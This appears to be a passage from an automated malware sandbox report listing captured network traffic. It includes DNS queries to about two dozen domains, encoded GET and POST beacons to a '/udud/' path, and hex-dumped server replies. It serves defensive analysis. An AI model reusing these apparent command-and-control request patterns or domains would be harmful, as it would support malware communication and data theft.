        Source: global trafficHTTP traffic detected: GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=s4Vg1LN8KF8xRZjsTtx1ePAa6rrZ5tQl+fVkjM0Cwqz81ntfAq/M/gVPDnM69uqRMv9oQTSMlpkV8bcLOwxh9sPoo9S5h5afGeOqgp9TfQfssWCdBUAOLW8= HTTP/1.1Host: www.gaglianoart.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo= HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: www.fivetownsjcc.com
        Source: global trafficDNS traffic detected: DNS query: www.maxiwalls.com
        Source: global trafficDNS traffic detected: DNS query: www.donantedeovulos.space
        Source: global trafficDNS traffic detected: DNS query: www.valentinaetommaso.it
        Source: global trafficDNS traffic detected: DNS query: www.cookedatthebottom.com
        Source: global trafficDNS traffic detected: DNS query: www.funtechie.top
        Source: global trafficDNS traffic detected: DNS query: www.l7aeh.us
        Source: global trafficDNS traffic detected: DNS query: www.grimfilm.co.kr
        Source: global trafficDNS traffic detected: DNS query: www.mindfreak.live
        Source: global trafficDNS traffic detected: DNS query: www.ntt.creditcard
        Source: global trafficDNS traffic detected: DNS query: www.avocatmh.org
        Source: global trafficDNS traffic detected: DNS query: www.lm2ue.us
        Source: global trafficDNS traffic detected: DNS query: www.noispisok.com
        Source: global trafficDNS traffic detected: DNS query: www.578tt67.com
        Source: global trafficDNS traffic detected: DNS query: www.uhahiq.com
        Source: global trafficDNS traffic detected: DNS query: www.weave.game
        Source: global trafficDNS traffic detected: DNS query: www.wp-bits.online
        Source: global trafficDNS traffic detected: DNS query: www.academynadpo.ru
        Source: global trafficDNS traffic detected: DNS query: www.quantumpowerlife.com
        Source: global trafficDNS traffic detected: DNS query: www.osbornesargent.co.uk
        Source: global trafficDNS traffic detected: DNS query: www.4-94.productions
        Source: global trafficDNS traffic detected: DNS query: www.gast.com.pl
        Source: global trafficDNS traffic detected: DNS query: www.gaglianoart.com
        Source: unknownHTTP traffic detected: POST /udud/ HTTP/1.1Host: www.maxiwalls.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.maxiwalls.comReferer: http://www.maxiwalls.com/udud/Content-Length: 205Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Raw: 50 6c 39 50 38 6c 64 58 3d 7a 35 48 41 4c 31 4c 56 4e 6b 42 6d 55 41 42 31 62 33 38 31 41 32 70 45 61 2b 6f 33 68 75 47 54 36 62 78 50 52 67 55 52 4d 66 71 55 66 76 4b 63 6c 69 69 4d 68 36 62 30 42 4c 59 35 4f 36 34 45 73 73 55 64 4b 6e 4e 50 46 66 42 77 72 45 41 64 6e 6d 75 55 6c 33 6c 6a 67 51 6e 35 46 37 43 48 37 52 64 31 70 44 64 49 2f 78 32 58 39 36 6b 57 43 78 4b 32 32 6f 32 46 74 65 32 48 66 4d 31 2b 47 6d 72 38 61 79 43 58 6f 49 7a 75 7a 6c 38 61 32 73 47 4d 72 51 74 49 30 71 69 74 73 6d 58 45 44 4a 65 75 31 44 5a 53 63 74 77 30 52 44 4f 76 4c 2b 51 43 37 6f 4f 33 47 4a 4f 4f 42 78 48 79 34 41 3d 3d Data Ascii: Pl9P8ldX=z5HAL1LVNkBmUAB1b381A2pEa+o3huGT6bxPRgURMfqUfvKcliiMh6b0BLY5O64EssUdKnNPFfBwrEAdnmuUl3ljgQn5F7CH7Rd1pDdI/x2X96kWCxK22o2Fte2HfM1+Gmr8ayCXoIzuzl8a2sGMrQtI0qitsmXEDJeu1DZSctw0RDOvL+QC7oO3GJOOBxHy4A==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:30:56 GMTServer: ApacheX-SERVER: 3908Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 27 May 2024 10:31:32 GMTServer: ApacheContent-Length: 199Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 27 May 2024 10:31:35 GMTServer: ApacheContent-Length: 199Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 27 May 2024 10:31:38 GMTServer: ApacheContent-Length: 199Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:32:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=716og1qojo3bifpm2m5772tjev; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 0e 3e 34 0e fe 14 34 1a bf d6 1a bf b6 f8 d3 39 e8 b8 a0 e8 12 2d 6c 7a 7b f3 f9 34 a8 66 f1 c2 9f 54 bf 96 f6 5f d2 df 7f 5a 1f df 38 f8 77 2c ec 45 de ae 06 bf 2d c2 9b 5e e5 df ab af 4f aa a7 f1 6c 0e 7e 1c 4c 03 70 23 18 34 88 c0 7b e7 67 bd 60 38 0e b0 5c a4 65 16 66 d3 e0 71 bb de 76 aa ce a5 07 7e f7 9c 28 8e 9c 2c 89 6f 3c b0 ec d1 91 33 f3 b2 24 9c c5 51 88 37 53 80 40 95 20 8b 67 33 2f 8d 8f 6b aa b9 85 44 e4 cd c0 6f 37 61 70 3b 8f 13 ae 24 d3 ef 6d 38 cc 26 bd 61 70 13 fa 41 55 3e ec 85 51 98 85 de b4 9a fa 00 dc 6b 18 94 64 30 0a ce 2c e5 44 85 3e 46 11 47 d5 cc 9b 57 27 e1 78 32 c5 8f 0d 3a 8a 4d 53 59 fa 5f b0 d2 f5 2a aa b7 6b f5 f6 9c 3f e1 e1 be eb a7 e9 12 e7 38 b3 60 18 7a 94 27 61 84 8e 45 b6 a4 d9 1d 16 e0 24 80 b8 d0 a4 fc ca ce 5b a3 5a 6b d4 e5 cf cd cd e8 9e ce 53 3f 09 82 c8 f1 a2 a1 b3 33 0b 23 45 c3 a3 46 9d ff 82 d9 ee 2a 5a ce 10 33 58 55 02 c0 ff ad e2 0c c3 d4 03 2f 0c 6d 74 97 87 f2 25 62 52 13 af e5 d7 5a fe 2d 7f 46 c9 fb 35 f8 db cb ce 22 da d7 f4 d4 ac b5 9a 21 7f 0e f6 7f 5b d3 93 99 a6 f5 94 6a 75 dc 7d d2 e9 cf c3 a7 01 61 d3 4a f9 d3 fd b5 b3 0e 1f 99 80 db 68 d8 f7 e3 69 9c f4 53 7f 12 cc 82 3e 25 77 af f2 27 e2 51 0f 6a f5 00 32 38 e8 7c 08 e7 db e3 31 0c d2 f7 59 3c 37 f8 6c 47 bd 9c 8b fe d4 11 b4 bd 5a db 6b f1 27 6b ac e3 21 c5 ca a4 a4 37 1c 42 68 dc 04 9a a4 7f 3a 2d 1b 5e ad e1 45 fc 19 cd c7 f7 d2 12 0b 2b 1e 27 de 7c 72 67 28 f8 e7 71 56 bd 51 ab 37 26 fc f9 d0 98 6d 8b c5 9f 30 9f 58 39 e1 3c 7b bc b3 b3 db 7b fc 69 1a 64 4e d0 fb b6 f1 08 32 3c cd 9c ac 27 6f c3 d1 ce b7 c1 77 df dd 86 d1 30 be 75
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:32:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=9usfs89hqp99jbkv3l42n50su4; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 0e 3e 34 0e fe 14 34 1a bf d6 1a bf b6 f8 d3 39 e8 b8 a0 e8 12 2d 6c 7a 7b f3 f9 34 a8 66 f1 c2 9f 54 bf 96 f6 5f d2 df 7f 5a 1f df 38 f8 77 2c ec 45 de ae 06 bf 2d c2 9b 5e e5 df ab af 4f aa a7 f1 6c 0e 7e 1c 4c 03 70 23 18 34 88 c0 7b e7 67 bd 60 38 0e b0 5c a4 65 16 66 d3 e0 71 bb de 76 aa ce a5 07 7e f7 9c 28 8e 9c 2c 89 6f 3c b0 ec d1 91 33 f3 b2 24 9c c5 51 88 37 53 80 40 95 20 8b 67 33 2f 8d 8f 6b aa b9 85 44 e4 cd c0 6f 37 61 70 3b 8f 13 ae 24 d3 ef 6d 38 cc 26 bd 61 70 13 fa 41 55 3e ec 85 51 98 85 de b4 9a fa 00 dc 6b 18 94 64 30 0a ce 2c e5 44 85 3e 46 11 47 d5 cc 9b 57 27 e1 78 32 c5 8f 0d 3a 8a 4d 53 59 fa 5f b0 d2 f5 2a aa b7 6b f5 f6 9c 3f e1 e1 be eb a7 e9 12 e7 38 b3 60 18 7a 94 27 61 84 8e 45 b6 a4 d9 1d 16 e0 24 80 b8 d0 a4 fc ca ce 5b a3 5a 6b d4 e5 cf cd cd e8 9e ce 53 3f 09 82 c8 f1 a2 a1 b3 33 0b 23 45 c3 a3 46 9d ff 82 d9 ee 2a 5a ce 10 33 58 55 02 c0 ff ad e2 0c c3 d4 03 2f 0c 6d 74 97 87 f2 25 62 52 13 af e5 d7 5a fe 2d 7f 46 c9 fb 35 f8 db cb ce 22 da d7 f4 d4 ac b5 9a 21 7f 0e f6 7f 5b d3 93 99 a6 f5 94 6a 75 dc 7d d2 e9 cf c3 a7 01 61 d3 4a f9 d3 fd b5 b3 0e 1f 99 80 db 68 d8 f7 e3 69 9c f4 53 7f 12 cc 82 3e 25 77 af f2 27 e2 51 0f 6a f5 00 32 38 e8 7c 08 e7 db e3 31 0c d2 f7 59 3c 37 f8 6c 47 bd 9c 8b fe d4 11 b4 bd 5a db 6b f1 27 6b ac e3 21 c5 ca a4 a4 37 1c 42 68 dc 04 9a a4 7f 3a 2d 1b 5e ad e1 45 fc 19 cd c7 f7 d2 12 0b 2b 1e 27 de 7c 72 67 28 f8 e7 71 56 bd 51 ab 37 26 fc f9 d0 98 6d 8b c5 9f 30 9f 58 39 e1 3c 7b bc b3 b3 db 7b fc 69 1a 64 4e d0 fb b6 f1 08 32 3c cd 9c ac 27 6f c3 d1 ce b7 c1 77 df dd 86 d1 30 be 75
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:32:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=7i622l48r6s2ese9kc0f0s342d; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 0e 3e 34 0e fe 14 34 1a bf d6 1a bf b6 f8 d3 39 e8 b8 a0 e8 12 2d 6c 7a 7b f3 f9 34 a8 66 f1 c2 9f 54 bf 96 f6 5f d2 df 7f 5a 1f df 38 f8 77 2c ec 45 de ae 06 bf 2d c2 9b 5e e5 df ab af 4f aa a7 f1 6c 0e 7e 1c 4c 03 70 23 18 34 88 c0 7b e7 67 bd 60 38 0e b0 5c a4 65 16 66 d3 e0 71 bb de 76 aa ce a5 07 7e f7 9c 28 8e 9c 2c 89 6f 3c b0 ec d1 91 33 f3 b2 24 9c c5 51 88 37 53 80 40 95 20 8b 67 33 2f 8d 8f 6b aa b9 85 44 e4 cd c0 6f 37 61 70 3b 8f 13 ae 24 d3 ef 6d 38 cc 26 bd 61 70 13 fa 41 55 3e ec 85 51 98 85 de b4 9a fa 00 dc 6b 18 94 64 30 0a ce 2c e5 44 85 3e 46 11 47 d5 cc 9b 57 27 e1 78 32 c5 8f 0d 3a 8a 4d 53 59 fa 5f b0 d2 f5 2a aa b7 6b f5 f6 9c 3f e1 e1 be eb a7 e9 12 e7 38 b3 60 18 7a 94 27 61 84 8e 45 b6 a4 d9 1d 16 e0 24 80 b8 d0 a4 fc ca ce 5b a3 5a 6b d4 e5 cf cd cd e8 9e ce 53 3f 09 82 c8 f1 a2 a1 b3 33 0b 23 45 c3 a3 46 9d ff 82 d9 ee 2a 5a ce 10 33 58 55 02 c0 ff ad e2 0c c3 d4 03 2f 0c 6d 74 97 87 f2 25 62 52 13 af e5 d7 5a fe 2d 7f 46 c9 fb 35 f8 db cb ce 22 da d7 f4 d4 ac b5 9a 21 7f 0e f6 7f 5b d3 93 99 a6 f5 94 6a 75 dc 7d d2 e9 cf c3 a7 01 61 d3 4a f9 d3 fd b5 b3 0e 1f 99 80 db 68 d8 f7 e3 69 9c f4 53 7f 12 cc 82 3e 25 77 af f2 27 e2 51 0f 6a f5 00 32 38 e8 7c 08 e7 db e3 31 0c d2 f7 59 3c 37 f8 6c 47 bd 9c 8b fe d4 11 b4 bd 5a db 6b f1 27 6b ac e3 21 c5 ca a4 a4 37 1c 42 68 dc 04 9a a4 7f 3a 2d 1b 5e ad e1 45 fc 19 cd c7 f7 d2 12 0b 2b 1e 27 de 7c 72 67 28 f8 e7 71 56 bd 51 ab 37 26 fc f9 d0 98 6d 8b c5 9f 30 9f 58 39 e1 3c 7b bc b3 b3 db 7b fc 69 1a 64 4e d0 fb b6 f1 08 32 3c cd 9c ac 27 6f c3 d1 ce b7 c1 77 df dd 86 d1 30 be 75
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:32:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=ivb4pecgn5jglcq8ucmv9i37gr; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheData Raw: 61 31 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 69 76 33 68 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 30 37 2f 30 37 66 2f 30 37 66 7a 71 38 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d
